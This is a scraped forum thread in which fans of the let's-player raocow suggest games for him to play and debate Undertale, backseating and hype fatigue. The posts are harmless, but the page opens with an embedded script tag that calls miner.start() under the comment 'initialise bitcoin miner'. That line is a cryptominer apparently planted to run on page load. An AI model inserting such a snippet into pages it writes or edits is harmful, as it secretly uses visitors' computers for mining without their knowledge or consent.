<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

request grab-bag

this is the place where lps are being talked about. it's important to talk about games being played on the internet.

i am a dog weasel ?!

very yes
49%
yes
25%
no
15%
very no
12%

Total votes: 211

Grounder

Re: request grab-bag

Postby Grounder » 5 months ago

Undertale, and to a lesser extent, Deltarune Chapter 1, seem like ripe backseating fodder, though. If Superstar Saga was a YT comment wasteland, I can only imagine how bad those two would be.
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 months ago

If you've been on the internet at all since it came out you've probably had its entire metastructure spoiled for you anyway : (
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Blivsey
forever an obscure pokemons
First name: Liv

Postby Blivsey » 5 months ago

I only played them for the first time late last year and, surprisingly enough, I felt like I'd been spoiled on so little, despite making zero effort to avoid spoilers.

That said, is "there's going to be backseating" a valid reason not to LP a game? It's definitely gonna be rampant, but to rule it out completely because of that...?
convenient noise thread for stress-relief purposes

Grounder

Postby Grounder » 5 months ago

Blivsey wrote: I only played them for the first time late last year and, surprisingly enough, I felt like I'd been spoiled on so little, despite making zero effort to avoid spoilers.

That said, is "there's going to be backseating" a valid reason not to LP a game? It's definitely gonna be rampant, but to rule it out completely because of that...?
In games people usually recommend going into as 100% blind as possible, yes.

In beloved ones with a bunch of easily missable conversations and easter eggs, I'd assume doubly so.
Why don't you eat me?

I am perfectly tasty...

ImageImageImage

CrappyBlueLuigi
pants are a tool of oppression
First name: Crepe
Pronouns: they/them

Postby CrappyBlueLuigi » 5 months ago

i think if raocow played undertale he'd just need to never read the comments or the talkhaus thread, or at least not read the comments and separately have people be mercilessly policing the thread if he's reading it. the undertale experience i'd want from raocow is one where the only things he knows are A) whatever he remembers from cultural osmosis and B) anything he learns while playing by himself.

more than anything else though, if there's anything i've taken away from the la-mulana and superstar saga lps, it's that i infinitely prefer raocow when he doesn't feel self-conscious about how he's playing a given game. whatever could possibly keep that at bay would be the best route imo.
someday, when i'm bigger,
i'm gonna be just like my mama!

Sebby19

Postby Sebby19 » 5 months ago

Gardenolva wrote: It would be good to suggest raocow some Paper Mario, is it?
I'll upvote this
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

ano0maly
Discord User

Postby ano0maly » 5 months ago

Just secretly record the whole thing and release one large video a week like cortex
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Blivsey

ano0maly wrote: Just secretly record the whole thing and release one large video a week like cortex
This but unironically if it was intended as a joke

CrappyBlueLuigi
pants are a tool of oppression
First name: Crepe
Pronouns: they/them

Postby CrappyBlueLuigi » 5 months ago

Blivsey wrote:
ano0maly wrote: Just secretly record the whole thing and release one large video a week like cortex
This but unironically if it was intended as a joke
also this but unironically if it was intended as a joke
someday, when i'm bigger,
i'm gonna be just like my mama!

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Postby Rockythechao » 5 months ago

Back when Undertale was still relatively completely fresh a number of us requested raocow play it for the same reasons he ended up playing M&L -- we figured he would enjoy the characters and humor, it'd work well as an introduction to RPGs, etc. There were enough of us requesting it that it became a bit of a Thing, and not long after that he mentioned on a patapon video that he was turned off from the game due to the oversaturation of fan stuff for it on tumblr at the time.

I'd personally still enjoy rao LPing the game at some point if he has changed his mind since then or ends up reconsidering at some point in the future, but yeah, only if it could be done in a way where he can just enjoy it on his own terms. And short of prerecording the full playthrough or waiting another year or two for this community to sort out the backseating issues and any remaining overzealous parts of the Undertale fandom to mellow out or possibly even move on to the full version of Deltarune... yeah.
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 months ago

Blivsey wrote:
KobaBeach wrote: tales of phantasia tbh.
I mean I've only played the more modern tales game and those are ALL a hundred hours each so is phantasia... not that?
this was a snes game originally so it's like 20-ish hours long?
twitter (spicy at times!) | avatar by kuma

who cares:

Sebby19

As far as raocow's 'games I would never play', I think Undertale is right beside Minecraft.

Cave Story used to be there too, but I think that has come off the list.
Years ago I thought 'What about a Cave Story hack?' I played played a few (demos), and thought they had a lot of potential. Some time later I asked that hacking community for suggestions for a good one rao could LP, but I can't remember if anyone suggested anything good.
I don't even know if the Cave Story hacking community is even alive anymore.
ImageImage
-Banned in Antarctica

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 5 months ago

Cave Story was the Undertale of its time - it seemed like everybody was Let's Playing it.

I'd actually like to see raocow try the NES Ninja Gaiden games. Or at least, I'd like to see them if it wasn't for the fact that they're one of the major contributors to Trap Jump Syndrome.

Alice
Pronouns: Girl person

Postby Alice » 5 months ago

10204307 wrote: It's easy to be turned off by the intense buzz surrounding the game, since everyone and their annoying dog has played it, but at its core it's still a very good game, and I think it would be a fun time for everyone.
I think it's less that everyone's played it than for months nobody would shut the hell up about the game. Personally I had zero interest in it to begin with. After everyone screaming about it for months on end all across the internet I have even less interest in it.

ano0maly
Discord User

Postby ano0maly » 5 months ago

I think if people talked about it for an extended period it's possible it would get me curious about it and give it a shot (which was the case for me here, I eventually gave the music a listen and thought it was well done before I played the game myself).

People talking about it continually for months doesn't decide whether you'll gain or lose interest. It's really the nature and presentation of the game that will do that.
Image The talkhaus Discord server. Come ask for an invite to join!

Now the sole biggest

Blivsey

ano0maly wrote: People talking about it continually for months doesn't decide whether you'll gain or lose interest.
Regrettably not true, considering the anecdotes in this thread. It shouldn't negatively influence people's interest! But people let it.

Leet

i love being victimized by middle schoolers
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Alice
Pronouns: Girl person

Postby Alice » 5 months ago

ano0maly wrote: I think if people talked about it for an extended period it's possible it would get me curious about it and give it a shot (which was the case for me here, I eventually gave the music a listen and thought it was well done before I played the game myself).

People talking about it continually for months doesn't decide whether you'll gain or lose interest. It's really the nature and presentation of the game that will do that.
Well as I said I already had zero interest in it in the first place. Having to constantly hear about something I couldn't care less about if I tried isn't ever going to make me more interested in it. It's the same reason I don't like Star Wars. I used to like it. Then I had a friend in high school who basically did nothing but talk about Star Wars 24/7. You just get tired of hearing about it and want nothing to do with it anymore.

Leet

I mean, all of American culture won't shut up about Star Wars. Which I would think would make everyone dislike it, but I see this kind of complaint more about Undertale than I do about Star Wars. (This is just an irrelevant personal observation)

Sebby19

Alice wrote: People talking about it continually for months doesn't decide whether you'll gain or lose interest. It's really the nature and presentation of the game that will do that.
Well as I said I already had zero interest in it in the first place. Having to constantly hear about something I couldn't care less about if I tried isn't ever going to make me more interested in it. It's the same reason I don't like Star Wars. I used to like it. Then I had a friend in high school who basically did nothing but talk about Star Wars 24/7. You just get tired of hearing about it and want nothing to do with it anymore.
Aw, I'm sorry that happened to you
ImageImage
-Banned in Antarctica

stormie
formerly maou shoujo

Postby stormie » 4 months ago

Once upon a time I voted down Undertale in a patreon poll. Mostly it was RPGs being totally new, along with the fact that it got recommended to everyone, so it didn't seem like raocow's style. Since the ice has been broken on RPGs though, I'll voice support on UT now. IF, and I cannot emphasize this enough, only if rao actively wants to play it. Not gonna force it.

Well okay it helps that in the time between that poll and now, I played UT myself and turned into a huge fan of it. :catplanet: My feelings on UT are long and complicated, but suffice to say that I would tune in to watch just about any streamer or LPer I follow play it. With the caveat of not forcing it on people, of course.

(Also thinking out loud to note that I should join the patreon again someday. I left supporting only because I was short of cash myself. Which is true again at this moment but hopefully not forever.)
occasional watcher of the lets plays and haver of too many usernames

SAJewers
hi

Postby SAJewers » 4 months ago

ImageImageImageImageImage
ImageImageImageImage

Grounder

Postby Grounder » 4 months ago

And of course it's a mobile game.

I understand that mobile and Switch are the only really viable platforms over in Japan, but you'd think a button-based platformer would be a big enough clue-in for the developers.
Why don't you eat me?

I am perfectly tasty...

ImageImageImage

Grounder

Postby Grounder » 4 months ago

I figure enough time has passed for me to recommend this one again properly.

Surprisingly pretty decent licensed adventure game for the GBC.
Why don't you eat me?

I am perfectly tasty...

ImageImageImage

The Doctor

Postby The Doctor » 4 months ago

I didn't play the GBC game, but I did play the sequel on the GBA, Hamtaro: Ham-Ham Heartbreak. It was actually produced by Shigeru Miyamoto himself. Awesome game. If the GBC game is half as good, I'd love to see raocow LP it.

Return to “let's play”